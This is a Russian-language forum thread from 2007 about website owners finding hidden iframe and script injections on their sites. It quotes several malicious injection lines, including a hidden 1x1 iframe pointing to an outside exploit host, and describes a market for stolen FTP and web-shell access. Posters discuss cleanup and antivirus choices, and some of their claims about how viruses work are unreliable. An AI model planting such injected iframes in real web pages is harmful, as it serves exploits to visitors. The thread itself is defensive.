Для счастливчиков, кто на у себя на сайте находит трояна и ifram`ы

[xsash 9]

Народу становится все больше, тех кто понимает чтото в php и вообще сети (с точки зрения матчасти) все меньше. Вероятно тут есть обратная зависимость =\

Итак. если Вы нашли на своем сайте код типа

<iframe src=http://***/***/ex.php border=0 width=1 height=1></iframe>

или

<script src=http://***/load.js></script>

(иногда такой код просто зашифрован яваскриптами - для невозможности прочтения) мои поздравления. с Вашего сайта либо гонится РУ трафик, либо используется для распространения какого-нить лоадера (который в дальнейшем загружается на зараженную машину другие трояны, начиная от пинча, и до ддос троев) Итак откуда у вас такое счастье. Если Вы подумали что ктото ваш сайт взломал - забудьте, на НАХ никому не дались. если будут ломать конкретно Вас - просто повесят дефейс. Им же нужно показать - что Вас поимели. Тогда возникает вопрос - откуда. Ну если не считать упорных слухов что есть приватные сплоиты для DLE верси(и/й) ?.? (я лично ниодин из них не видел ни у кого из знакомых) то можно сказать что кто-то получил доступ к Вашему ftp. это можно осуществить двумя путями. 1) вы заражены - все ваши пароли у злоумышлинников (например трой pinch3 - гугль рулит) - как вы заразились.... 1.1) открыли "фотку" девушки из icq 1.2) глянули флеш ролик с приклеенным троем 1.3) зашли на страницу как у вас, которая содержит експлоит (опять же гугль подскажет) 2) наиболее правдивый вариант - поимели не Вас, а вашего хостера, и как сделствие еще и все остальные сайты которые он поддерживает (т.е. в этом теплом и темном месте не вы одни, а с целой компанией) сушествуют скрипты, которым необходимо подсунуть список

ftp:pass

ftp:pass

ftp:pass

ftp:pass

и они АВТОМАТОМ прописывают во все index.php/index.html и прочие файлы по умолчанию заданный текст. обыно это наш любимый ифрейм с адресом ведущим на сплоит =)

есть куча людей, которые просто с удовольствием покупают такие списки (ну плюс желательно чтобы был хороший индекс и пиар) по несколько тысяч ftp

например вот вам заголовки

>Покупаю фтп в больших количествах

>Покупаю ФТП с PR>4, веб-шеллы, руты

>Покупаю ФТП (edu, gov, com pr5)

>FTP Toolz pack - скрипт для работы с ftp-акками

>КУПЛЮ ДОРОГО: roots, ftps, shells, webshells

>Куплю FTP, вебшеллы. PR >=3

>Куплю веб-шелы и FTP в любых зонах, любой PR

>~ нужны ФТП(и ШЕЛЛЫ!) .EDU ~

>Возьму Фтп, вэб-шеллы

>Скупаю ftp/shells/traff/bd

>EDU 60-150$ беру. И обычные домены приветствуются.

>покупаю FTP и вебшеллы к доменам в зонах .edu .gov

и это только один форум! =)

ИТОГО.

1) проверьтесь антивирусниками

2) удалите мусор в виде фреймов

3) смените пароли

4) скажите хостеру, что у него проблемы

5) поменяйте браузер с IE6

просьба не флеймить, а задавать конкретыне вопросы по сабжу - постараюсь ответить

[Foxa 0]

наиболее правдивый вариант - поимели не Вас, а вашего хостера

Бред... не надо всю вину валить на хостера

[xsash 9]

уговорил. я всегда знал, что самая главная ошибка в 90% сидит за метр от монитора.

[гиперон 0]

а где в DLE могут сидеть эти фреймы?

я обнаружил один в index файле но когда я его отуда убираю

у меня эксплоер выдаёт ошибку((

типа страница загружена с ошибками

да и с фреймом сайт работает ка кни вчём не бывало

открыл архвные фалы старых проинсталеных версий DLE там в индекс файле тоже это <iframe src='http://strumpf1.com/yabb/Sources/' width='1' height='1' style='visibility: hidden;'></iframe>

откуда оно взялось

Изменено 5 марта 2007 пользователем гиперон

[MSD 0]

Оно взялось из нуленой версии.

Удивительно, правда? )))

[medi 0]

Не обязательно нуль.

[solobon 0]

Я сменил пароль на ФИП и больше он не появлялся

[Danila 8]

Антивирус встроенный в DLE этот эксплоит ловит? Или вручную надо это искать?

[celsoft 6 067]

Антивирус встроенный в DLE этот эксплоит ловит?

ловит в 5.5. если вы предварительно до этого сделаете снимок системы

[EVRIAL 0]

Спасибо за статью, но для меня это уже пройденный этап Такая история была со мной, когда я ещё сидел на IE6, но даже NOD32 с последними базами не смог защитить от пинча... вот так..

xsash, если не трудно, будь добр расскажи как защититься от пинча.. Ведь он обходит практически все антивирусники и фаеры...

[Alexandr 1]

но даже NOD32

Помоему лутше Капреа ничего нет.

А то что хостеров опускают это факт.

Сейчас на многие хостеры идет дос атака.

[Stude_nt 0]

zuven, Что кассается антивирусника, Каспер (ихмо) великий тормоз всего, он приколый для сисадминов в офисе, но не для дома... В 5.5 версии DLE делайте снимок в антивирусе, а потом проверяйте. По сути, в записях iframe, виноваты хостеры (не грамотная настройка сервера и принебрежение безопасности - а может не знание). А если хостинг majordomo.ru, то я бы переехал (собственно, что и сделал годик назад), так же как и с агавы, админы серверов там не компитентны вообще, их ломали/заражали, так и будут (пока грамотных не наберут, для обслуживания серверов). Что бы не ловить всё это, надо на нормальных хостах сайты ставить...

[Lyubovnick3 1]

Каспер грузит сильно компьютер, но к счастью мне это незаметно.

Был такой вроде как анекдот:

Устроили тестирование антивируса Касперского и NOD32.

Запустили в компьютер вирус.

NOD32 ни один не пропустил.

Установили Каспера, запустили вирусы.

Так же ни одного не пропустил.

Но не из-за того, что качественный антивирус,

а из-за того, что вся процессорная память была занята Касперским

и вирус не мог запустится

И всё таки Каспера я предпочитаю

[Al-x 7]

Snow Land,

тож предпочитаю каспера, но не всегда его запускаю. Работать параллельно с прогами, требующими много памяти - невозможно. Ладно, это оф.

Хотел спросить Stude_nt: скажите плиз: использую хостинг infobox.ru, пока не встречался с подобными проблемами, но всё равно как считаете - можно этой компании доверять? или не сталкивались?

[medi 0]

infobox.ru

А по моему инфобокс давно уже себя зарекомендовал как нормальный хостинг, я вот думаю к ним свой дедик поставить.

[xsash 9]

EVRIAL

да никак. просто банальные правила.

патченная система, патченные проги, браузер НЕ IE? не открывать левые ссылки.

у меня вот антивируса и нет подавно.... только фаер рекламу режет... и ничего, живой

zuven

дос причем тут? ну вот скажи, кому хостер чейто дался? другое дело чейто проект убивают, это нормально, поэтому и хостер прогибается

Изменено 6 марта 2007 пользователем xsash

[Lyubovnick3 1]

Во дела, так тут у всех всё пропатченое

И нах я и Windows XP / Vista покупал, и антивирусы

Кстати, кто сталкивался с программой Trust Cleaner

[xsash 9]

не, бывает мозги не пропатчены =\

я сам раза 2 просто _случайно_ открывал левые ссылки и запускал файлы. обычно заработаешься над проектом, а тут те ссылка от друга... а то что он мне ссылко никогда не дает доходит после минуты... а его протроянили... ну и начинается чистака компа, смена паролей...

ну никто от этого не застрахован

[Lyubovnick3 1]

xsash, В этом плане кстати, антивирус и облегчает жизнь

[xsash 9]

Snow Land

человек который РЕАЛЬНО занимается троянами, НИКОГДА не будет использовать вирусы, которые палятся.

в тя пинчем чтоли кинуться чистяком? =)

или на связку сплоитов пустить по ссылке, которая чтоже не определится ничем?

не нужно забывать еще кучу приватных бонусов которые ТОЖЕ "облегчают жизнь"

[Lyubovnick3 1]

Ну может тогда рассмотрим что такое вирус?

Это порядок определённых байт, или как это называется "сигнатуры".

Вирус должен содержать именно определённый порядок и никак иначе.

Это не программа блокнот или тот же фотошоп, который содержит транслитериpoванный машинный код, а просто цифровой порядок и ничего более.

Видел HEX редакторы?

Вот, это и есть сигнатуры, из которых состоят так называемые вредоносные коды.

Нарушения этого порядка приведёт просто к деструкции.

Стоит почитать некоторые книги, которые остались в библиотеках, времён IBM ...

Так что понятие вирус не такое буквальное, как ты написал выше постом.

[Stude_nt 0]

Al-x, об этом хосте не слышал ни чего плохого...

Snow Land, я не сталкивался с Trust Cleaner, но на мой взгляд, это всё параноя... Подобных программ куча: Antiy GhostBusters Pro, Anti-keylogger, McAfee AntiSpyware Enterprise Standalone и для совсем параноиков Safe’n’Sec Personal (программа жесть, в купе с антивирусом (только не с Каспером) и Agnitum Outpost Firewall PRO) вообще не пробиваемая стена, парой даже админу не реально завершить или запустить некоторые скрытые процессы

[Lyubovnick3 1]

Stude_nt, вот был у меня этот Trust Cleaner.

Почитай, что это такое (привожу конкретные ссылки):

http://www.softboard.ru/lofiversion/index.php/t38431.html

http://virusinfo.info/showthread.php?t=6017

[Stude_nt 0]

Почитал... К сведению принял... собственно, я не устанавливаю левых прог, период тестирования компа закончился у меня пару лет назад... теперь только проверенное ПО ставлю... в общем, познавательно почитать тем, кто любит поэксперементировать , а в итоге ифреймы...

Изменено 7 марта 2007 пользователем Stude_nt

[гиперон 0]

Хотел спросить Stude_nt: скажите плиз: использую хостинг infobox.ru, пока не встречался с подобными проблемами, но всё равно как считаете - можно этой компании доверять? или не сталкивались?

тоже им пользуюсь, но не доверяю уже, не радует он меня(( постоянно у них какие-то проблемы с сервами

как-то движёк от этого накрылся(( едиснственно скорость у них хорошая

следующим этапом буду брать mchost.ru